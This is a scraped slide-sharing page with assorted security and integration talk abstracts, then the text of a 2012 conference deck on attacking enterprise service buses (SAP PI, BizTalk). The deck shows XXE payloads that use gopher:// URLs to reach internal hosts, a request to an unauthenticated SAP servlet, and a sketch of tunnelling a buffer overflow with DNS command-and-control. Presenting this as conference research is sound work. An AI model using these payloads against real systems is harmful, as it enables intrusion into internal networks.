Alfresco DevCon 2019: Encryption at-rest and in-transitToni de la Fuente
To guarantee data integrity and confidentiality in Alfresco, we need to implement authentication and encryption at-rest and in-transit. With micro services proliferation, orchestrating platforms, complex topologies of services and multiple programming languages, there is a demand of new ways to manage service-to-service communication, and in some cases, without the application needing to be aware. In addition to that, compliance requirements around encryption and authentication come to the picture requiring new ways to handle them. This talk will review encryption at-rest solutions for ADBP, and will be also discuss about solutions for encryption and authentication between services. This will be an introduction to service mesh and TLS/mTLS. We will see a demo of ACS running with Istio over EKS along with tools like WaveScope, Kiali, Jaeger, Grafana, Service Graph and Prometheus.
Slides for a college course at City College San Francisco. Based on "Hands-On Ethical Hacking and Network Defense, Third Edition" by Michael T. Simpson, Kent Backman, and James Corley -- ISBN: 9781285454610.
Instructor: Sam Bowne
Class website: https://samsclass.info/123/123_S17.shtml
Microsoft DirectAccess Remote Access (VPN) with Windows 10 and Server 2012Kemp
Microsoft DirectAccess is a VPN like remote access technology that is a core component of the Windows Server 2012 R2 Remote Access role. DirectAccess is a unique solution that is designed to replace traditional VPN access. It provides secure, seamless, transparent and always-on remote access to corporate networks for clients running Windows 7 Enterprise, Windows 7 Ultimate, Windows 8.1 Enterprise, and now, Windows 10.
Windows 10 support is welcome as over half of the 110 million managed Microsoft clients in Enterprise deployments have adopted the latest release. Eager as they are to get the new features Windows 10 offers, such as the new improved Start menu, the modern Edge web browser, Cortana – the intelligent personal assistant, Windows Hello authentication, and many other improvements.
DirectAccess provides these advantages over most traditional VPN solutions:
- Active Directory Domain joined client computers connect automatically rather than connections being user initiated
- Connections seamlessly work through all firewalls
- Supports selected server access when connected
- Can use IPSEC authentication to corporate servers
- Supports end to end encryption of the connection
- Provides transparent failover to another corporate network access point or site if required
- Supports offline domain join for clients that have never been on the corporate network
-Allows central IT staff to manage the remote computers over the DirectAccess connection
The integration with standard corporate Domains and the ability to manage clients remotely is very compelling especially for maintaining a client population that is remote and mobile with users who seldom connect directly to a corporate network.
Windows 10 and DirectAccess work really well in concert to provide a true remote access solution for Windows based clients. One that users will not have to struggle with, and one that IT and security staff can be confident about using.
Alfresco DevCon 2019: Encryption at-rest and in-transitToni de la Fuente
To guarantee data integrity and confidentiality in Alfresco, we need to implement authentication and encryption at-rest and in-transit. With micro services proliferation, orchestrating platforms, complex topologies of services and multiple programming languages, there is a demand of new ways to manage service-to-service communication, and in some cases, without the application needing to be aware. In addition to that, compliance requirements around encryption and authentication come to the picture requiring new ways to handle them. This talk will review encryption at-rest solutions for ADBP, and will be also discuss about solutions for encryption and authentication between services. This will be an introduction to service mesh and TLS/mTLS. We will see a demo of ACS running with Istio over EKS along with tools like WaveScope, Kiali, Jaeger, Grafana, Service Graph and Prometheus.
Slides for a college course at City College San Francisco. Based on "Hands-On Ethical Hacking and Network Defense, Third Edition" by Michael T. Simpson, Kent Backman, and James Corley -- ISBN: 9781285454610.
Instructor: Sam Bowne
Class website: https://samsclass.info/123/123_S17.shtml
Microsoft DirectAccess Remote Access (VPN) with Windows 10 and Server 2012Kemp
Microsoft DirectAccess is a VPN like remote access technology that is a core component of the Windows Server 2012 R2 Remote Access role. DirectAccess is a unique solution that is designed to replace traditional VPN access. It provides secure, seamless, transparent and always-on remote access to corporate networks for clients running Windows 7 Enterprise, Windows 7 Ultimate, Windows 8.1 Enterprise, and now, Windows 10.
Windows 10 support is welcome as over half of the 110 million managed Microsoft clients in Enterprise deployments have adopted the latest release. Eager as they are to get the new features Windows 10 offers, such as the new improved Start menu, the modern Edge web browser, Cortana – the intelligent personal assistant, Windows Hello authentication, and many other improvements.
DirectAccess provides these advantages over most traditional VPN solutions:
- Active Directory Domain joined client computers connect automatically rather than connections being user initiated
- Connections seamlessly work through all firewalls
- Supports selected server access when connected
- Can use IPSEC authentication to corporate servers
- Supports end to end encryption of the connection
- Provides transparent failover to another corporate network access point or site if required
- Supports offline domain join for clients that have never been on the corporate network
-Allows central IT staff to manage the remote computers over the DirectAccess connection
The integration with standard corporate Domains and the ability to manage clients remotely is very compelling especially for maintaining a client population that is remote and mobile with users who seldom connect directly to a corporate network.
Windows 10 and DirectAccess work really well in concert to provide a true remote access solution for Windows based clients. One that users will not have to struggle with, and one that IT and security staff can be confident about using.
Hybrid Integration with Dynamics CRM Online, Microsoft Azure Service Bus and ...Colin Meade
In this presentation we will walk through a real-world hybrid integration solution involving Microsoft Dynamics CRM Online, Microsoft Azure Service Bus, AppFx.ServiceBus and on-premises Line Of Business systems.
We will show how a robust and scalable integration between CRM and on-premises services can be achieved in a relatively short timescale using these technologies.
In ihrem Vortrag "What is an ESB? Concepts in Comparison" erläutern Torsten Winterberg (OPITZ CONSULTING) und Bernd Trops (Sopera), was ein Entersprise Service Bus ist und geben Hintergrundwissen zum Thema.
Hybrid Integration with Dynamics CRM Online, Microsoft Azure Service Bus and ...Colin Meade
In this presentation we will walk through a real-world hybrid integration solution involving Microsoft Dynamics CRM Online, Microsoft Azure Service Bus, AppFx.ServiceBus and on-premises Line Of Business systems.
We will show how a robust and scalable integration between CRM and on-premises services can be achieved in a relatively short timescale using these technologies.
In ihrem Vortrag "What is an ESB? Concepts in Comparison" erläutern Torsten Winterberg (OPITZ CONSULTING) und Bernd Trops (Sopera), was ein Entersprise Service Bus ist und geben Hintergrundwissen zum Thema.
SoC Keynote:The State of the Art in Integration TechnologySrinath Perera
This talk discusses Outline of the state of the art of Enterprise Software and how we get there, as I see it. Also second part describes Ballerina, a new programming language WSO2 has built for Enterprise Computing.
It is presented as a Keynote at 11th Symposium and Summer School On Service-Oriented Computing.
Security in the cloud Workshop HSTC 2014Akash Mahajan
A broad overview of what it takes to be secure. This is more of an introduction where we introduce the basic terms around Cloud Computing and how do we go about securing our information assets(Data, Applications and Infrastructure)
The workshop was fun because all the slides were paired with real world examples of security breaches and attacks.
Traditional datacenter is broken up into a number of silos: network, storage, virtualization, and application. The emerging Software Defined Datacenter movement breaks those silos and creates a playground for innovation, convergence, and new opportunities to reveal the hidden and unknown. During this session I will describe what the Software Defined Data Center hype is all about, how it breaks the traditionally established silos while creating the opportunities for data driven orchestration powered by Machine Learning principals that will make cloud providers and enterprises FINALLY realize the value of virtualization and ultimately deliver the self-driving data center where open initiative is at the front and center.
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...DefconRussia
Докладчик покажет, как с помощью bare-metal programming подружить Raspberry Pi с GPIO, памятью и Ethernet, и пояснит, кому и зачем это может понадобиться.
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...DefconRussia
Intel Boot Guard — аппаратно поддержанная технология верификации подлинности BIOS, которую вендор компьютерной системы может встроить на этапе производства. Докладчик представит результаты анализа технологии, расскажет об её эволюции. Слушатели узнают, как годами клонируемая ошибка на производстве нескольких вендоров позволяет потенциальному злоумышленнику воспользоваться этой технологией для создания в системе неудаляемого (даже программатором!) скрытого руткита. Github: https://github.com/flothrone/bootguard
[Defcon Russia #29] Алексей Тюрин - Spring autobindingDefconRussia
В Spring MVC есть классная фича — autobinding. Но если пользоваться ей неправильно, могут появиться «незаметные» уязвимости, иногда с серьёзным импактом. Рассмотрим пару примеров, углубимся в тонкости появления autobinding-багов. Writeup [ENG]: http://agrrrdog.blogspot.ru/2017/03/autobinding-vulns-and-spring-mvc.html
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/LinuxDefconRussia
Руткиты в мире основанных на ядре Linux операционных систем уже не являются редкостью. Рассказ будет о том, как попытки в современных реалиях определить то, скомпрометирована ли система, привели к неожиданному результату.
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC DefconRussia
Мы поговорим об общей проблеме валидации входных данных и качестве их обработки. Интерпретация входящих данных оказывает прямое влияние на решения, принимаемые в физической инфраструктуре: если какая-либо часть данных обрабатывается недостаточно аккуратно, это может повлиять на эффективность и безопасность процесса.
В этой беседе мы обсудим атаки на процесс обработки данных и природу концепции «never trust your inputs» в контексте информационно-физических систем (в общем смысле, то есть любых подобных систем). Для иллюстрации проблемы мы используем уязвимости аналого-цифровых преобразователей (АЦП), которые можно заставить выдавать поддельный цифровой сигнал с помощью изменения частоты и фазы входящего аналогового сигнала: ошибка масштабирования такого сигнала может вызывать целочисленное переполнение и дает возможность эксплуатировать уязвимости в логике PLC/встроенного ПО. Также мы покажем реальные примеры использования подобных уязвимостей и последствия этих нападений.
Cisco network equipment has always been an attractive attack target due to its prevalence and the key role that it plays in network structure and security.
This equipment is based on a wide variety of OS (firmware) architectures, types, and versions, so it is much harder to develop a universal shellcode. Publicly available Cisco IOS shellcodes are tailored to specific equipment, have narrow functionality, and are not exactly useful for penetration testing.
This talk is the presentation of a research initiated by our research center to create a shellcode which is as easily portable between different IOS firmwares as possible and which provides a lot of pentesting features because it can dynamically change the shellcode destination at the stage of post-exploitation.
We will also consider the possibility of creating a worm which could spread across the infrastructure, from firewall to router, from router to switch, etc.
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...DefconRussia
Расскажу где и как iCloud Keychain хранит пароли, и какие потенциальные риски это несёт. Apple утверждает, что пароли надежно защищены, и даже её сотрудники не могут получить к ним доступ. Чтобы это подтвердить или опровергнуть, необходимо разобраться с внутренним устройством iCloud Keychain, чем мы и займемся.
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхDefconRussia
Все шире и шире получают распространение bugbounty программы - программы вознаграждения за уязвимости различных вендоров. И порой при поиске уязвимостей находятся места, которые явно небезопасны (например - self XSS), но доказать от них угрозу сложно. Но чем крупнее (хотя, скорее адекватнее) вендор, тем они охотнее обсуждают и просят показать угрозу от сообщенной уязвимости, и при успехе – вознаграждают 8). Мой доклад – подборка таких сложных ситуаций и рассказ, как же можно доказать угрозу.
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Polyakov how i will break your enterprise. esb security and more
1. Invest in security
to secure investments
How I will break your enterprise:
ESB Security and more
Alexander Polyakov
CTO at ERPScan (Digital Security)
November 19, 2012
4. Hint
What do we do if we have a secure target website
on a hosting?
5. Answer
• We can do the same for companies
• Just Google for the target company
suppliers and customers
• Pwn one of them
• Find a link to the secured company
6. But how?
• Almost all big companies are connected to each other
• To make their business work
• For example, companies generate automatic Payment Orders
from one business application to another
• They use some kind of middleware to do this
• Sometimes, those systems can be open to the Internet
• Mostly not
• But they must be open for partners
• What kind of systems are u talking about?
10. What do we know about their security?
• Nothing
– Actually, very little info
• They can have vulnerabilities
– A lot of vulnerabilities
• Because they are complex
– Very complex
• And very customized
– Because it’s more of a framework than software
11. Some ESB problems
ESB is all about DATA
• Missing encryption
– Not so easy to configure, so mostly unencrypted
– A lot of swag data transferring
• Support for a lot of interfaces and protocols
– Many points of failure
– Can be used as a proxy to attack other systems
And, of course, all the other software security problems
12. If we attack ESB from a connected company
• We have one bonus
• As we have already pwn’d the connected
company
• We have auth data to connect to ESB
interfaces
• But our goal is to jump through ESB to the
target company
13. IBM Web Sphere MQ
• IBM Web Sphere MQ
• Middleware application for handling messaging within an enterprise
network
• The first ESB that was publicly researched for vulnerabilities (in 2007)
• A great presentations by MWRLab
• Whitepaper with 87 pages of MQ insights!
• http://labs.mwrinfosecurity.com/assets/141/mwri_websphere
-mq-security-white-paper-part1_2008-05-06.pdf
14. SAP NetWeaver PI
• SAP NetWeaver PI / XI
• Tool for process integration / system integration
• Has SOAP Adapter
• With default services
• We found one that was
accessible without authorizations
• Accept XML: any XML based attack (Patched by SAP Note 1707494)
DilbertMSG
• /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.
• More about this later
16. Microsoft BizTalk
• MS BizTalk
• For the same purpose
• ESB toolkit used to be additional software, but in
BizTalk 2013, it is integrated
• 0 results for “BizTalk Security” in search engines
• Doesn’t have default services with auth bypass :(
18. BizTalk map
Company External
Web-portal Suppliers
HR Customers
Data Warehouse
BizTalk Banks
Logistics Insurance
BizTalk
ERP Partners
Billing Branches
Picture taken from http://habrahabr.ru/post/94861/
19. Microsoft BizTalk: how it works
• You send data to a virtual “Input port”
• The port can be anything, from a file to an FTP folder or a web
service or something else
• BizTalk takes this data and transforms it (Orchestration)
• There are special tools to perform the transformation
• Then the packet is sent to an “Output port”
So, the simple transformation can have common XML issues
depending on the application
22. BizTalk Transformation example
• The operation is performed by a functoid
• There are a lot of functoids with math and logical stuff
• One of the funniest to attack is Database lookup functoid
• If u find it in some XML, u can connect to external DB’s
• Sometimes with integrated security (trust)
Provider=msdaora;Data Source=thisdb;Persist Security Info=False;Integrated Security=Yes;
• Also supported: Sybase, Oracle, MySQL, Informix, FoxPro,
Firebird, Exchange, Excel, DBase, DB2,Access …
23. BizTalk Binding
Virtual ports must be linked to the real ports they call (binding)
• Static binding. A static port is already configured at the time of
deployment to use a transport so as to deliver messages to a
specific external end point. A transport type selects an adapter and
a URI address.
• Direct binding can also be used to send messages directly into the
message box. External binding configuration cannot be used with
directly bound orchestration ports.
• Dynamic Binding. Transport types and locations dynamically
selected by dynamic ports. The orchestration port is responsible for
having the required properties created within the message context.
27. BizTalk Itinerary: full control over the packet
• Itinerary-based routing simplifies the development of
enterprise-level messaging
• In simple words, an itinerary is a sequence of operations
performed on a message
• An itinerary consists of the list of services to execute (which
can contain routing, transformation, and custom services)
and the configuration information required to resolve the
metadata necessary to execute each of these services
• For example, it may instruct the service to perform UDDI or
Business Rules Engine (BRE) lookup for information about a
specific target end point to which it will route the message
A huge area to have fun
28. Searching for BizTalk applications
• OK, cool, but how can we find all this stuff?
• Except sniffing?
• Answer: UDDI
• Database of all web services installed on BizTalk
• Just look for ports 80 or 8080 for /uddi or /uddipublic
• Add WSDL to URL :)
40. SSRF proxy attack
Corporate Secure
network network
Packet B Packet B
Packet A
41. SSRF
• A possibility to use a vulnerable server as a proxy to attack
other servers located in secure subnetwork
• A way to jump from one subnetwork to another
• A lot of examples of how to run SSRF attack
• We can use any popular business application to run SSRF
• More details about SSRF
– Part 1 http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-
applications-whitepaper.pdf
– Part 2 http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf
42. Exploiting SSRF
For every SSRF attack, there must be at least 2
vulnerabilities to successfully trigger the attack:
• First vulnerability
– Functionality in some service on Server A which allows us to
send remote packets (for other types of SSRF)
• Second vulnerability
– Vuln. in service on server B (for remote SSRF )
– Vuln. in localhost service on server A (for local SSRF)
– Vuln. in client app. on server A (for back-connect SSRF)
43. Multiprotocol calls (in XML)
• A lot of XML stuff in ESB
• XML seems to be the new TCP
• Almost all big projects use XML based data transfer
• There are a lot of XML based protocols with different options to
call external resources and thus conduct SSRF attacks
• There is at least one element type which fits almost all XML
based schemes. The type is: xsd:anyURI
• URIs also encompass URLs of other schemes (e.g., FTP, gopher,
telnet), as well as URNs
• Popular URIs: http:// ftp:// telnet:// …..
44. Multiprotocol calls in XML
• XML
– XML External Entity
– XSD definition
• XML Encryption
• XML Signature
• WS-Policy
• From WS-Security
• WS-Addressing
• XBRL
• ODATA (edmx)
– ODATA External Entity
– Other
• BPEL
• STRATML
• …….
Details: http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf
45. Exploiting Gopher (Example)
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM “gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>
What will happen??
46. XXE Tunneling (Example)
Server A (Portal or XI)
POST
/XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.
web.DilbertMSG?format=post HTTP/1.1
Host: 192.168.0.1:8000
192.168.0.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM AAAAAAAAAAAAA Server B (ERP,
“gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo> HR, BW etc.)
Port
3300
telnet 172.16.0.1 3300
172.16.0.1
47. XXE Tunneling (Hint 2)
• Next step is to pack exploit in packet B inside Packet A
• We need to insert non-printable symbols
• God bless gopher; it supports urlencode like HTTP
• It will also help us evade attack against IDS systems
Packet A
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80
Content-Length: 7730
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM “gopher://[Urlencoded Packet B]" >]>
<foo>&date;</foo>
48. XXE Tunneling to Buffer Overflow (Result)
Server A on the
Internet
(SAP XI)
POST
/XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.
web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80 Packet B
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM “gopher://[packetB]"
>]> http://company.com Server B in DMZ
<foo>&date;</foo>
exploit
Packet C – Command and
Control response to attacker by Shellcode
DNS protocol, which is allowed service with
for outband connections DNS
payload
172.16.0.1
49. Great, we can jump from one secured
network to another.
What’s next?
50. We are inside, so what?
• All your systems have password lock policies
• Because we are in a secure company, rrright?
• And secure applications send passwords securely
• While user is authenticating
51. We are inside, so what?
• All your systems have password lock policies
• Because we are in a secure company, rrright?
• And secure applications send passwords securely
• While user is authenticating!
62. Issue tracking systems
• Noh I’m not talking about XSS/SQLI/LFI/OMG/WTF/ETC
• Of course they exist, but
• We are in a “very-very secure” company, which has WAF
• And HTTPS
• Really secure HTTPS (yes Moxie)